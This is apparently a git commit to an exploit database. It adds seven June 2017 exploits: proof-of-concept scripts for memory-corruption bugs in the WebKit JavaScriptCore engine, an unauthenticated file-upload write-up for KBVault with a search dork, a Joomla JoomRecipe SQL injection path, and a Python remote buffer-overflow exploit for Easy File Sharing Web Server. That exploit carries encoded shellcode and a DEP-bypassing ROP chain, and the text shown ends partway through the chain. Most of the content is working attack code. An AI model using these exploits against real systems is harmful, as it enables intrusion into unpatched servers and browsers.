DB: 2017-06-17

7 new exploits WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass) KBVault MySQL 0.16a - Arbitrary File Upload Joomla! Component JoomRecipe 1.0.3 - SQL Injection
2017-06-17 05:01:25 +00:00 · 2017-06-17 05:01:25 +00:00 · 248f7e7480
commit 248f7e7480
parent a090330e55
8 changed files with 482 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5544,6 +5544,10 @@ id,file,description,date,author,platform,type,port
 42170,platforms/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos,0
 42171,platforms/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos,0
 42182,platforms/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,windows,dos,0
 42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0
 42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
 42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
 42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15602,6 +15606,7 @@ id,file,description,date,author,platform,type,port
 42165,platforms/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote,0
 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38009,3 +38014,5 @@ id,file,description,date,author,platform,type,port
 42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
 42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0
 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
 42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0
 42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0
--- a/platforms/aspx/webapps/42184.txt
+++ b/platforms/aspx/webapps/42184.txt
@ -0,0 +1,33 @@
 # Exploit Title: [KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code]
 # Google Dork: [inurl:"FileExplorer/Explorer.aspx"]
 # Date: [2017-06-14]
 # Exploit Author: [Fatih Emiral]
 # Vendor Homepage: [http://kbvaultmysql.codeplex.com/]
 # Software Link: [http://kbvaultmysql.codeplex.com/downloads/get/858806]
 # Version: [0.16a]
 # Tested on: [Windows 7 (applicable to all Windows platforms)]
 # CVE : [CVE-2017-9602]
 1. Description
 KBVault Mysql Free Knowledge Base application package comes with a third party file management component. An unauthenticated user can access the file upload (and delete) functionality using the following URI:
 http://host/FileExplorer/Explorer.aspx?id=/Uploads
 2. Exploit
 Through this functionality a user can upload an ASPX script to run any arbitrary code, e.g.:
 http://host/Uploads/Documents/cmd.aspx
 3. Solution
 Unauthenticated access to the file management function should be prohibited.
 File uploads should be checked against executable formats, and only acceptable file types should be allowed to upload.
 4. Disclosure Timeline
 2017-06-09: Vendor notification
 2017-06-09: Vendor responded with intention to fix the vulnerability
 2017-06-12: CVE number acquired
 2017-06-15: Public disclosure
--- a/platforms/multiple/dos/42188.html
+++ b/platforms/multiple/dos/42188.html
@ -0,0 +1,123 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1208
 After JSGlobalObject::haveABadTime is called, the type of all JavaScript arrays(including newly created arrays) are of the same type: ArrayWithSlowPutArrayStorage. But (of course) this only affects objects that share the same JSGlobalObject. So arrays come from another JSGlobalObject can cause type confusions.
 void JSGlobalObject::haveABadTime(VM& vm)
 {
 	...
    for (unsigned i = 0; i < NumberOfIndexingShapes; ++i)
        m_arrayStructureForIndexingShapeDuringAllocation[i].set(vm, this, originalArrayStructureForIndexingType(ArrayWithSlowPutArrayStorage));  <<-- The type of a newly created array will be ArrayWithSlowPutArrayStorage
    ...
    while (!foundObjects.isEmpty()) {
        JSObject* object = asObject(foundObjects.last());
        foundObjects.removeLast();
        ASSERT(hasBrokenIndexing(object));
        object->switchToSlowPutArrayStorage(vm); <<------ switch type of an old array
    }
 }
 1. fastSlice:
 JSArray* JSArray::fastSlice(ExecState& exec, unsigned startIndex, unsigned count)
 {
    auto arrayType = indexingType();
    switch (arrayType) {
    case ArrayWithDouble:
    case ArrayWithInt32:
    case ArrayWithContiguous: {
        VM& vm = exec.vm();
        if (count >= MIN_SPARSE_ARRAY_INDEX || structure(vm)->holesMustForwardToPrototype(vm))
            return nullptr;
        Structure* resultStructure = exec.lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(arrayType);
        JSArray* resultArray = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, count);
        if (!resultArray)
            return nullptr;
        auto& resultButterfly = *resultArray->butterfly();
        if (arrayType == ArrayWithDouble)
            memcpy(resultButterfly.contiguousDouble().data(), m_butterfly.get()->contiguousDouble().data() + startIndex, sizeof(JSValue) * count);
        else
            memcpy(resultButterfly.contiguous().data(), m_butterfly.get()->contiguous().data() + startIndex, sizeof(JSValue) * count);
        resultButterfly.setPublicLength(count);
        return resultArray;
    }
    default:
        return nullptr;
    }
 }
 If |this| came from another JSGlobalObject, and |haveABadTime| was called, the type of |resultArray| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
 <html>
 <body>
 <script>
 Array.prototype.__defineGetter__(100, () => 1);
 let f = document.body.appendChild(document.createElement('iframe'));
 let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);
 let c = Array.prototype.slice.call(a);
 alert(c);
 </script>
 </body>
 </html>
 2. arrayProtoPrivateFuncConcatMemcpy
 EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncConcatMemcpy(ExecState* exec)
 {
 ...
    JSArray* firstArray = jsCast<JSArray*>(exec->uncheckedArgument(0));
    ...
    IndexingType type = firstArray->mergeIndexingTypeForCopying(secondType);
    ...
    Structure* resultStructure = exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(type);
    JSArray* result = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, firstArraySize + secondArraySize);
    if (!result)
        return JSValue::encode(throwOutOfMemoryError(exec, scope));
    if (type == ArrayWithDouble) {
        double* buffer = result->butterfly()->contiguousDouble().data();
        memcpy(buffer, firstButterfly->contiguousDouble().data(), sizeof(JSValue) * firstArraySize);
        memcpy(buffer + firstArraySize, secondButterfly->contiguousDouble().data(), sizeof(JSValue) * secondArraySize);
    } else if (type != ArrayWithUndecided) {
        WriteBarrier<Unknown>* buffer = result->butterfly()->contiguous().data();
        memcpy(buffer, firstButterfly->contiguous().data(), sizeof(JSValue) * firstArraySize);
        if (secondType != ArrayWithUndecided)
            memcpy(buffer + firstArraySize, secondButterfly->contiguous().data(), sizeof(JSValue) * secondArraySize);
        else {
            for (unsigned i = secondArraySize; i--;)
                buffer[i + firstArraySize].clear();
        }
    }
    result->butterfly()->setPublicLength(firstArraySize + secondArraySize);
    return JSValue::encode(result);
 }
 If |firstArray| came from another JSGlobalObject, and |haveABadTime| was called, the type of |result| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
 PoC:
 -->
 <html>
 <body>
 <script>
 Array.prototype.__defineGetter__(100, () => 1);
 let f = document.body.appendChild(document.createElement('iframe'));
 let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
 let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
 let c = Array.prototype.concat.call(a, b);
 alert(c);
 </script>
 </body>
 </html>
--- a/platforms/multiple/dos/42189.html
+++ b/platforms/multiple/dos/42189.html
@ -0,0 +1,44 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1218&desc=2
 Here's a snippet of arrayProtoFuncSplice.
 EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
 {
    ...
            result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
            if (!result)
                return JSValue::encode(throwOutOfMemoryError(exec, scope));
            for (unsigned k = 0; k < actualDeleteCount; ++k) {
                JSValue v = getProperty(exec, thisObj, k + actualStart);
                RETURN_IF_EXCEPTION(scope, encodedJSValue());
                if (UNLIKELY(!v)) {
                    continue;
                }
                result->initializeIndex(vm, k, v);
            }
    ...
 }
 |JSArray::tryCreateForInitializationPrivate| will return an uninitialized JSArray. So the next routine must clear its all indices. But the routine skips holes in |thisObj|. This is fine under normal circumstances because the type of |result| will be ArrayWithUndecided, unless you're having a bad time. We can force |result|'s type to ArrayWithSlowPutArrayStorage by using |JSGlobalObject::haveABadTime|.
 PoC:
 -->
 function gc() {
    for (let i = 0; i < 0x10; i++)
        new ArrayBuffer(0x1000000);
 }
 Array.prototype.__defineGetter__(0x1000, () => 1);
 gc();
 for (let i = 0; i < 0x100; i++) {
    new Array(0x100).fill(1234.5678);
 }
 gc();
 print(new Array(0x100).splice(0));
--- a/platforms/multiple/dos/42190.html
+++ b/platforms/multiple/dos/42190.html
@ -0,0 +1,51 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1220
 When compiling Javascript code into machine code, bound checks for all accesses to a typed array are also inserted. These bound checks are re-optimized and the unnecessary checks are removed, which is performed by IntegerCheckCombiningPhase::handleBlock.
 For example, when the following JavaScript code is compiled, there are all bound checks for 8, 5, 2, but after the optimization, the checks for 5 and 2 are removed, and the only check for 8 will remain.
 function f() {
    let arr = new Uint32Array(10);
    for (let i = 0; i < 0x100000; i++) {
        parseInt();
    }
    arr[8] = 1;
    arr[5] = 2;
    arr[2] = 3;
 }
 f();
 Note: parseInt is for forcing to start the JIT optimization.
 Here's a snippet IntegerCheckCombiningPhase::handleBlock.
 void handleBlock(BlockIndex blockIndex)
 {
    ...
        if (range.m_count) {
            if (data.m_addend > range.m_maxBound) {
                range.m_maxBound = data.m_addend;
                range.m_maxOrigin = node->origin.semantic;
            } else if (data.m_addend < range.m_minBound) {
                range.m_minBound = data.m_addend;
                range.m_minOrigin = node->origin.semantic;
            }
    ...
 }
 The problem is that the check |data.m_addend > range.m_maxBound| is a signed comparison.
 PoC:
 -->
 function f() {
    let arr = new Uint32Array(10);
    for (let i = 0; i < 0x100000; i++) {
        parseInt();
    }
    arr[8] = 1;
    arr[-0x12345678] = 2;
 }
 f();
--- a/platforms/multiple/dos/42191.html
+++ b/platforms/multiple/dos/42191.html
@ -0,0 +1,40 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1229
 Here's tryCreateArrayButterfly which is invoked from intlObjectFuncGetCanonicalLocales to create a JSArray object.
 inline Butterfly* tryCreateArrayButterfly(VM& vm, JSCell* intendedOwner, unsigned initialLength)
 {
    Butterfly* butterfly = Butterfly::tryCreate(
        vm, intendedOwner, 0, 0, true, baseIndexingHeaderForArrayStorage(initialLength),
        ArrayStorage::sizeFor(BASE_ARRAY_STORAGE_VECTOR_LEN));
    if (!butterfly)
        return nullptr;
    ArrayStorage* storage = butterfly->arrayStorage();
    storage->m_sparseMap.clear();
    storage->m_indexBias = 0;
    storage->m_numValuesInVector = 0;
    return butterfly;
 }
 It allocates a fixed size(BASE_ARRAY_STORAGE_VECTOR_LEN) of memory without caring about |initialLength|. So a BOF occurs in the following iteration.
 EncodedJSValue JSC_HOST_CALL intlObjectFuncGetCanonicalLocales(ExecState* state)
 {
    ...
    auto length = localeList.size();
    for (size_t i = 0; i < length; ++i) {
        localeArray->initializeIndex(vm, i, jsString(state, localeList[i]));
        RETURN_IF_EXCEPTION(scope, encodedJSValue());
    }
    ...
 }
 PoC:
 -->
 Object.prototype.__defineGetter__(1000, () => 2);
 let locales = ['mr', 'bs', 'ee-TG', 'ms', 'kam-KE', 'mt', 'ha', 'es-HN', 'ml-IN', 'ro-MD', 'kab-DZ', 'he', 'es-CO', 'my', 'es-PA', 'az-Latn', 'mer', 'en-NZ', 'xog-UG', 'sg', 'fr-GP', 'sr-Cyrl-BA', 'hi', 'fil-PH', 'lt-LT', 'si', 'en-MT', 'si-LK', 'luo-KE', 'it-CH', 'teo', 'mfe', 'sk', 'uz-Cyrl-UZ', 'sl', 'rm-CH', 'az-Cyrl-AZ', 'fr-GQ', 'kde', 'sn', 'cgg-UG', 'so', 'fr-RW', 'es-SV', 'mas-TZ', 'en-MU', 'sq', 'hr', 'sr', 'en-PH', 'ca', 'hu', 'mk-MK', 'fr-TD', 'nb', 'sv', 'kln-KE', 'sw', 'nd', 'sr-Latn', 'el-GR', 'hy', 'ne', 'el-CY', 'es-CR', 'fo-FO', 'pa-Arab-PK', 'seh', 'ar-YE', 'ja-JP', 'ur-PK', 'pa-Guru', 'gl-ES', 'zh-Hant-HK', 'ar-EG', 'nl', 'th-TH', 'es-PE', 'fr-KM', 'nn', 'kk-Cyrl-KZ', 'kea', 'lv-LV', 'kln', 'tzm-Latn', 'yo', 'gsw-CH', 'ha-Latn-GH', 'is-IS', 'pt-BR', 'cs', 'en-PK', 'fa-IR', 'zh-Hans-SG', 'luo', 'ta', 'fr-TG', 'kde-TZ', 'mr-IN', 'ar-SA', 'ka-GE', 'mfe-MU', 'id', 'fr-LU', 'de-LU', 'ru-MD', 'cy', 'zh-Hans-HK', 'te', 'bg-BG', 'shi-Latn', 'ig', 'ses', 'ii', 'es-BO', 'th', 'ko-KR', 'ti', 'it-IT', 'shi-Latn-MA', 'pt-MZ', 'ff-SN', 'haw', 'zh-Hans', 'so-KE', 'bn-IN', 'en-UM', 'to', 'id-ID', 'uz-Cyrl', 'en-GU', 'es-EC', 'en-US-posix', 'sr-Latn-BA', 'is', 'luy', 'tr', 'en-NA', 'it', 'da', 'bo-IN', 'vun-TZ', 'ar-SD', 'uz-Latn-UZ', 'az-Latn-AZ', 'de', 'es-GQ', 'ta-IN', 'de-DE', 'fr-FR', 'rof-TZ', 'ar-LY', 'en-BW', 'asa', 'zh', 'ha-Latn', 'fr-NE', 'es-MX', 'bem-ZM', 'zh-Hans-CN', 'bn-BD', 'pt-GW', 'om', 'jmc', 'de-AT', 'kk-Cyrl', 'sw-TZ', 'ar-OM', 'et-EE', 'or', 'da-DK', 'ro-RO', 'zh-Hant', 'bm-ML', 'ja', 'fr-CA', 'naq', 'zu', 'en-IE', 'ar-MA', 'es-GT', 'uz-Arab-AF', 'en-AS', 'bs-BA', 'am-ET', 'ar-TN', 'haw-US', 'ar-JO', 'fa-AF', 'uz-Latn', 'en-BZ', 'nyn-UG', 'ebu-KE', 'te-IN', 'cy-GB', 'uk', 'nyn', 'en-JM', 'en-US', 'fil', 'ar-KW', 'af-ZA', 'en-CA', 'fr-DJ', 'ti-ER', 'ig-NG', 'en-AU', 'ur', 'fr-MC', 'pt-PT', 'pa', 'es-419', 'fr-CD', 'en-SG', 'bo-CN', 'kn-IN', 'sr-Cyrl-RS', 'lg-UG', 'gu-IN', 'ee', 'nd-ZW', 'bem', 'uz', 'sw-KE', 'sq-AL', 'hr-HR', 'mas-KE', 'el', 'ti-ET', 'es-AR', 'pl', 'en', 'eo', 'shi', 'kok', 'fr-CF', 'fr-RE', 'mas', 'rof', 'ru-UA', 'yo-NG', 'dav-KE', 'gv-GB', 'pa-Arab', 'es', 'teo-UG', 'ps', 'es-PR', 'fr-MF', 'et', 'pt', 'eu', 'ka', 'rwk-TZ', 'nb-NO', 'fr-CG'];
 Intl.getCanonicalLocales(locales);
--- a/platforms/php/webapps/42185.txt
+++ b/platforms/php/webapps/42185.txt
@ -0,0 +1,16 @@
 # # # # #
 # Exploit Title: Joomla! Component JoomRecipe 1.0.3 - SQL Injection
 # Dork: N/A
 # Date: 15.06.2017
 # Vendor : http://joomboost.com/
 # Software: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
 # Demo: http://demo-joomrecipe.joomboost.com/
 # Version: 1.0.3
 # # # # #
 # Author: EziBilisim
 # Author Web: https://ezibilisim.com/
 # Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/all-recipes/category/[SQL]
 # # # # #
--- a/platforms/windows/remote/42186.py
+++ b/platforms/windows/remote/42186.py
@ -0,0 +1,168 @@
 #!/usr/bin/python
 # Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
 # Exploit Author: bl4ck h4ck3r
 # Software Link: http://www.sharing-file.com/efssetup.exe
 # Version: Easy File Sharing Web Server v7.2
 # Tested on: Windows XP SP2, Windows 2008 R2 x64
 import socket
 import struct
 import sys
 if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <host>\n"
    exit()
 # 0x1002280a :  # ADD ESP,1004 # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
 ret = struct.pack("<I", 0x1002280a)
 # nopsled
 shellcode = "\x90"*200
 # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
 shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
 shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
 shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
 shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
 shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
 shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
 shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
 shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
 shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
 shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
 shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
 shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
 shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
 shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
 shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
 shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
 shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
 shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
 shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
 shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
 shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
 shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
 shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
 shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
 shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
 shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
 shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
 shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
 shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
 shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
 shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
 shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
 shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
 shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
 shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
 shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
 shellcode += "\x45\x50\x41\x41"
 def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
 		# 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
 		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
 		0xFFFFFDFE,  # -202
 		0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
 		0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]|   {PAGE_EXECUTE_READ}
 		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
 		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
 		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
 		0x1004de84,  # &Writable location [ImageLoad.dll]
 		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
 		0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
 		0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
 		0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
 		0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
 		0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
 		0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
 		0x61c24169,  # & push esp # ret  [sqlite3.dll]
 		0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
 		0x1001bd98,  # POP ECX # RETN [ImageLoad.dll]
 		0x1004de84,  # &Writable location [ImageLoad.dll]
 		0x61c373a4,  # POP EDI # RETN [sqlite3.dll]
